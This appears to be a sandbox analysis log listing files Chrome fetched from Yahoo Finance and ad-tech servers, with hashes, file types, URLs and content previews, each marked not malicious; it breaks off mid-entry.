                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=yieldmo&f=i&uid=VRLAoLL__uL1ewyIa5Iq&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9237100146972455
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUHl/RPlr02mxhl/E5lmfpse:f9x0Rl/HBse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3F386F5061436A0338A64E0910DB495D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:599FE4A552C991A2B3CE5A1660732BF7B21FB901
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0AF3AAE90B7DE9FDCEEE2AB421378EA2F54C74BE81EF43FC6C1790A032755D80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:235479F42CBBE0A4B0100167FECE0D14C9B47D272B3BA8322BCFE8539F055BF31D500E7B2995CC968EBF73034E039F59C5F0F9410428663034BF119D74B5672C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!..NETSCAPE2.0.....!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.790864812649304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:QCWNKCeI0l65yumO5Ayx1sEdcuY5wRfUsezmyPLKHP6DfIXa+IYdu4oU1iWNKCJT:QEI95u5wR0LKv6Grdu4oU1DE8dHGs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:69533DEE43FCB84E1728E9E7F45B4F5E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:A7652CDE71E70687E7F5BC62851206397E193E86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:39C6F403514C5324067A39670524D8A207080F9D7D1F1E4C3480E98E307D21A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9E92A47AC4639CFD8CE4EC2F10F20DA5CB52BF435523C380EA64D044C38C6CFE9B1F26AE169F13AF952E376B756DE7E000B13458139EAC7B73B3FB9138CAB6A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/StoryMetaPublishing.uqjoCQC9.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.publishing.yf-1weyqlp{align-items:center;display:flex;font-size:var(--font-s);gap:var(--space-1);line-height:1.25;white-space:nowrap;font-weight:var(--font-normal);margin-top:-1px;flex-wrap:wrap}.publishing.bolded.yf-1weyqlp{font-weight:var(--font-bold)}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1992)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.341125535622204
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:acLCN6p9KC9ACKIStwPi/pnTEd7pUc+vX3PCJFhIBXnevn:agQC9kntkwpnA8zfPnMvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:94B700E3113BF5305B375906ED4ED357
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EBC0E5FBF97EF3EF2FDC220C89DCD869E9E5AC7C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B6E2B1024D75E182D92D00FF5C2CB42ED6D8592A2A809EB6F329428919B5B787
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:98672655608FBCAF2B2C7789646AEFBD5B01BCFF9E4BDB9BE930D3B4A08847B4CB0B5C41F816BD44CB121AF7D306B9B29B8F0B547800A52DF6F5D587082664F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as h,e as v,d as b,f as k,i as p,q as d,L as g,k as y,c as w,u as I,g as N,a as S,n as q}from"./scheduler.Dsuh-FKt.js";import{S as z,i as E,g as B,a as u,e as C,t as _,c as D,b as H,m as L,d as M}from"./index.CvwOawEI.js";import{I as T}from"./Icon.C8w5V9EK.js";/* empty css */const V='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M4 11h16v2H4z"/></svg>';function j(o){let t;const s=o[4].default,e=w(s,o,o[3],null);return{c(){e&&e.c()},l(a){e&&e.l(a)},m(a,l){e&&e.m(a,l),t=!0},p(a,l){e&&e.p&&(!t||l&8)&&I(e,s,a,a[3],t?S(s,a[3],l,null):N(a[3]),null)},i(a){t||(_(e,a),t=!0)},o(a){u(e,a),t=!1},d(a){e&&e.d(a)}}}function A(o){let t,s;return t=new T({props:{icon:V,size:"large",type:"tertiary"}}),{c(){D(t.$$.fragment)},l(e){H(t.$$.fragment,e)},m(e,a){L(t,e,a),s=!0},p:q,i(e){s||(_(t.$$.fragment,e),s=!0)},o(e){u(t.$$.fragment,e),s=!1},d(e){M(t,e)}}}function F(o){let t,s,e,a,l;const f=[A,j],r=[];function
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):21
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.403989446485262
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:YBE+dmYn:Yvvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:031A8B6F8BAEA1DF8DA69CAFED49D579
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BA6C224B8AC88AD4368A30775BBD4CBAD9BE3BA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E5C0644466F49DFB193A225E813EB639BD14B0933EAA4CF457688BA716D49D95
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5B70D7F4F7B5A20657E835AEC1698BE17949EBA4E9B68E4DADD13B5BE9328A602CA815C9AD9CC6205F291199E18E7237CB4512CC840904F65AC4162F388B5801
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"data":[],"meta":{}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 536x284, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):12038
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.98465046090651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:lwWB65iaamZUsvPMdwsChI5QLDCkl0IQFDtKEDmKcesRJcgisBZVOmJ45sWJw3D:CW2WmCtdwf2KLdGIotKEKYsLcg1kJG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:EB7ECE1031BFB5BB8CB2D979D18F0DC0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:410B61D1BEF4225E3528D92EBB1F17D342117471
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EE9BAEBC61EC2F907DCE94611F6BC13C3F26E3450DD6E821C5ABE5B4E648E086
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F941009131F9ABB5B609CAF022CA879C5177AA2CC37802FF10D30F74B956FAD292A5EFB5704B05DDAB60989C94B50517C2D346B0F512236DB735A98CDF9065F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/W7BlkVb3JweZnQNoIkHchA--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/miami_herald_mcclatchy_975/6cc52b158992fe8218d9d85b25491d91.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF....WEBPVP8 ....p....*....>y<.I.."1...r0..ene.D.|s..m........s.(.U.8.....7C.pM]..Gz.....c..4?.?.......o.oQ..|.....7n.......Q.....a|.g%...4.........+. .....J...Ve.d.T.*..em.7/..(...^}s6r0t..g..6.W.x\.~USmu....t_,.k..3b0.8..#.&g.6.b..s..?1./).W.`....[....+....K'.[6...=..&.>9&.b.....s.h.Z.q...@........C...b}.....Q..UwOP;..p..~P.k..&...M.m.4.u.~G.>q`>$2u..`{)..}../.{......&g...j........N.$......(...M..}. ..k.S...Y.\...n..j*.W.tcs(..[3l&....q..D.^.}g.X.ng.4.%.PU.w.p#...iq....q..X.+...U...*;..i..jQ...'..&..~H...N....*...|.D..B..9..M#.T..>|..#..T^.".?t./.C.Am..<X..\....4&.....J......6......-_.N.+mm..'..(....$.Fj..X...Ot...x7...Mw(.. .....$...i..3..Uvh.xOQH.z...^......".....k......[....;..O......o<...{..J....hg5.....m.E...|v...[GA.......<c...u.J.iW...B..@....P_.^D.F*3...../&.c..J.Pfg...?_t.x.Z.J..c.....-...p..Z ...^..ie(.@...e...l.t..I.._.U...At........'kV.f,.f.{.........W=.1.C.G..R)h.r.$.n.Fs.C.l....9/.4/S.........<..`b.@cG\.D0...].....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, WAVE audio, IEEE Float, stereo 44100 Hz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):189160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.422217355234855
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:e9wzBZw8XQP5WSNXh/gxEuIwb26S+Q8A89FVA4CmtB59JtjIcAqOCJxoHStwNp+b:rw8gP5WStapIO2j+PA8bPJXfx2SGsTH
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:8ABFE6DFA7B0D9A5A4B7268155054740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FE841D96C94923C7732014A81BCB574FE2C10584
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:75799B61C8D93B46365AE3A603EF508ACEE921ADBF2ABF4ADA583FC4E0E4BB82
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A6A475C64D5E0BC3CB94BD38B38DA66F5B4470F50738286F2D42030D2E32EF15D6C795DFA8DA36502E536819DABABE9386CA7419F2C6CB0E8580053ACE1166D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/misc/voice-start-202105050733.wav:2f81efb753e890:0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF....WAVEfmt ........D... b.... .datah...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (457)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.8806961233017665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:a1PV6fTJL3lSIss7VU0feFw1PDKTKLA4ev:a1iJxSIDV1feu1sK84w
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4B110FF4168F6551B3EF74DF58EF047D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5668BC75EACEFE35E50928DAFD3F4D96A08E4714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1E52AD2B125B6F05F5ED5037BD44186F4B1C2D5FFBAF08E436A3FC1597B214F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:797154B1BA3A9C8DFC21629727E91B234E36140056DCD710DB0A10FEBED5919006E68775FB75DBEB7B34581B69D5D9B04323EFFF606A33336BD96BB7658512C6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m22 9.24-7.19-.62L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21 12 17.27 18.18 21l-1.63-7.03zM12 15.4l-3.76 2.27 1-4.28-3.32-2.88 4.38-.38L12 6.1l1.71 4.04 4.38.38-3.32 2.88 1 4.28z"/></svg>',l='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 17.27 18.18 21l-1.64-7.03L22 9.24l-7.19-.61L12 2 9.19 8.63 2 9.24l5.46 4.73L5.82 21z"/></svg>';export{s as S,l as a};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (38328)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):38329
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.576372612018181
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:QsHSFvgHlHs0LHVa7bEBC8uo9dDHPSwy6ZTqYId27xqKO+oH6jf/JL26AhZ20CIk:VHNfLHbO6xyB/pSIJnLO
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B6302C52CB5FF5F6FFF360A8C5ACE824
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:35EB0373223C8001536A91F5A4CA3997467FEA3A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:E77C930680AC2886239146E82A32D3D8231DA7FE7BEDDF3EAECC16E8413CE64E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:32A132A8D319437EB76C7194E02DF750955106CC48D23D788CD642FA07BA373726337D2EF41A6D23FD360461FBD1679AD6B219BBCA60DBD873C05CF2EBD1C59B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/FilteredStories.BZDUwXYM.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as $,P as at,n as V,e as S,d as M,f as D,i as g,q as w,k as E,l as C,x as Te,Q as rt,b as O,j as z,t as U,h as W,L as j,as as ft,a4 as Ee,G as xe,I as et,p as H,c as le,A as ke,M as ce,u as ne,g as oe,a as se,m as ut,O as ge,a1 as ct}from"./scheduler.Dsuh-FKt.js";import{S as x,i as ee,c as N,b as K,m as F,t as b,a as k,d as B,g as Q,e as Y}from"./index.CvwOawEI.js";import{e as Z,u as _t,o as mt}from"./each.CI2tb2RB.js";import{g as ve,a as Se}from"./spread.CgU5AtxT.js";import{t as R,m as dt,g as Me,a5 as ht}from"./commonUtil.BWwawKjd.js";import{B as be}from"./Button.C2rixdaC.js";import{I as tt}from"./Icon.C8w5V9EK.js";import{L as gt}from"./Link.vSNQugO0.js";import{M as bt}from"./MenuSurface.CpHW4OA2.js";import{f as ue,s as kt}from"./utils.CNaWwYSx.js";import{C as vt}from"./close.C3ug6nNR.js";import{a as lt}from"./StoryItem.Dq_amti6.js";import{I as It}from"./InfiniteScroll.B0InYP9n.js";import{S as De}from"./SkeletonLoader.D0M7dqCu.js";import{S as nt}from"./Spinner.D9ew0_W4.js";i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4894)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.114691169704432
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:/1RRvdm3kqG247dPTYm0yvvxELpLQ584F5rKOfZT3/8IXVB6ERPId7yujyPs25qe:/xA3G7RrRVvJI057zrVfZTdQOuws25qe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:0047048591F5EAABD122899609CA3651
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F84F96637792B11CBAFF506CBA4872EB3A00C6C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C20F6E2C69FED31D678F7BC2E101C4395F4FFD12637B6B1EF4EC31125956BF61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6B61355C4EB80E4B7A5A982F260698132A41C0E94559EF58BF9DE5AECA4723224EDA71CACC26EBEAB148A57888A03752C170F95E0301AA793051D94A0F2BAEE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-221e929c.fe18bba9bd24a5a21e11.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[886],{4834:(t,e,s)=>{var o=s(4603);var a,r;a="undefined"!=typeof window?window:s.g,(r=void 0!==o.mE?o.mE:a.CIQ).ThemeHelper=r.ThemeHelper||function(t){this.params=t;var e=t.stx,s="#FFFFFF";e.chart.container&&(s=getComputedStyle(e.chart.container).backgroundColor,r.isTransparent(s)&&(s=e.containerColor)),this.settings.chart.Background.color=r.hexToRgba(s),this.settings.chart["Grid Lines"].color=r.hexToRgba(e.canvasStyle("stx_grid").color),this.settings.chart["Grid Dividers"].color=r.hexToRgba(e.canvasStyle("stx_grid_dark").color),this.settings.chart["Axis Text"].color=r.hexToRgba(e.canvasStyle("stx_xaxis").color),this.settings.chartTypes["Candle/Bar"].up.color=r.hexToRgba(e.canvasStyle("stx_candle_up").color),this.settings.chartTypes["Candle/Bar"].down.color=r.hexToRgba(e.canvasStyle("stx_candl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1911)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1912
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.265795322246812
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:qjvyQ3tjzY1boftAZbq0ejRi4iVRSr4c1fQv44zg9:qjvntjzY96UbREW7FRv44za
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DEA4B1E928B3DE42020FCE62C1F5D8F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:7DFBBF555418C47401B8DF86235DA52C358C7EEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A98BBBC743525D160FB7638E1ED20C0B4B9FB833349FF8F466D7A418AF140946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:48CF5D603C9DDA3E8191E240ACB223498A8AAFCB46809AEE81A791B0C594E972DA1FB7651D931B1EF53568BFF839B35C8621B301E2D7291860418B258CC1665A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as P,c as b,h as A,J as w,K as E}from"./commonUtil.BWwawKjd.js";import{f as k,l as g}from"./logUtil.CCV3qKPL.js";async function C(n,o){var l;const{type:i="performance",pfId:f,silent:p=!1,range:m="1d",interval:h="2m",symbol:u}=o,[a,[s]]=await Promise.all([P(n),b(["portfolio"],n)]);if(!A(a)||!((l=a.user)!=null&&l.guid)||i==="quotePerformance"&&!u)return;const t={end:"2",start:"1"};f&&i==="performance"?t.pfId=f:i==="quotePerformance"&&(t.symbol=u),typeof o.start=="number"&&typeof o.end=="number"?(t.start=o.start.toString(),t.end=o.end.toString()):(t.interval=h,t.range=m);try{const r=await k(n,{crumb:!0,pathname:`/ws/portfolio-timeseries-api/v2/portfolio/${i}/chart`,perfLabel:"getPerformanceChart",query:t,timeout:5e3});if(!p){const d=w(r==null?void 0:r.chart);s.updatePerformanceChart({chart:d,pfId:f})}return r}catch(r){throw g(n,o,{data:r,perfLabel:"getPerformanceChart"}),p||s.setError(E),r}}async function q(n,o){var d;const{interval:i="5m",indicators:f="close",includeTimestamps:p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1796)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1797
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.343775722446907
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:aODX71tTxoqzuFIGgp72jAEDv8aWZkMV+Pt:a+LrzuF/g52j5z1p
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:A0731AE5328FB7E27B8A1190E31E37D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8C0C24B0BC13C6A694B9636DC35A665F68121BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0FC2735B3FEACBC9688619921525BEADD2D62F4205B99705ADD5E91FFA51ECEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F8154DA16731B3E7FEF9CD5C7C7E2DBDC7B33DDAB0EF2BA1DEE5D3457186E84B539B979E598B48B5B5449F32683745B4C74ABA361664908D935BC4C69249DB6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/QuoteLink.DBlp3tix.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as p,e as k,d as S,f as V,K as m,k as c,i as f,t as y,h as q,m as v}from"./scheduler.Dsuh-FKt.js";import{S as L,i as M,c as Q,b as w,m as z,t as D,a as C,d as I}from"./index.CvwOawEI.js";import{L as K}from"./Link.vSNQugO0.js";import{n as u}from"./commonUtil.BWwawKjd.js";function U(s){let t;return{c(){t=y(s[1])},l(n){t=q(n,s[1])},m(n,l){c(n,t,l)},p(n,l){l&2&&v(t,n[1])},d(n){n&&f(t)}}}function W(s){let t,n,l;return t=new K({props:{href:u({symbol:s[1]}),size:s[2],variant:"loud",i13nModel:{elm:"ct",elmt:"qte",sec:s[0].options.meta.rapidSec,slk:s[1],...s[0].options.meta.subSec?{subsec:s[0].options.meta.subSec}:{},...s[4]},$$slots:{default:[U]},$$scope:{ctx:s}}}),{c(){n=k("div"),Q(t.$$.fragment),this.h()},l(e){n=S(e,"DIV",{style:!0});var a=V(n);w(t.$$.fragment,a),this.h()},h(){m(n,"display","contents"),m(n,"--link-font-weight",s[3])},m(e,a){c(e,n,a),z(t,n,null),l=!0},p(e,[a]){const o={};a&2&&(o.href=u({symbol:e[1]})),a&3&&(o.i13nModel={elm:"ct",elmt:"qte",sec:e[0].options.meta.rapid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?p=156578&predirect=&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html><body><script type="text/javascript">(function(){var aa=window,p=navigator,ai=aa.top||aa,aj=aa.location.search.substr(1),A=encodeURIComponent,W=decodeURIComponent,aA=aa.parseInt,P=aa.PubMatic||(aa.PubMatic={}),K=0,ad=0,b=0,ao="pubmatic.com",V="ads."+ao,al=1,Q="https://",a=(aa.__cmp?1:0),an=function(aF){return typeof aF==="function"},au=console.log.bind(console,"PubMatic:"),at=function(aJ,aI){var aG=0,aF=aJ.length,aH=false;for(;aG<aF;aG++){if(aJ[aG]===aI){aH=true;break}}return aH},n=function(aF,aI){var aH=aa.document.createElement("script");aH.type="text/javascript";aH.src=aF;aH.async=true;if(an(aI)){aH.onload=aH.onreadystatechange=aI}var aG=aa.document.getElementsByTagName("script")[0];aG&&aG.parentNode&&an(aG.parentNode.appendChild)&&aG.parentNode.appendChild(aH)},aq=function(aH){var aG=aa.document.createElement("iframe");aG.src=aH;aG.style.height="0px";aG.style.width="0px";aG.style.display="none";aG.height=0;aG.width=0;aG.border="0px";aG.hspace="0";aG.vspace="0";aG.marginWidth=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1615), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1615
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.020901609734713
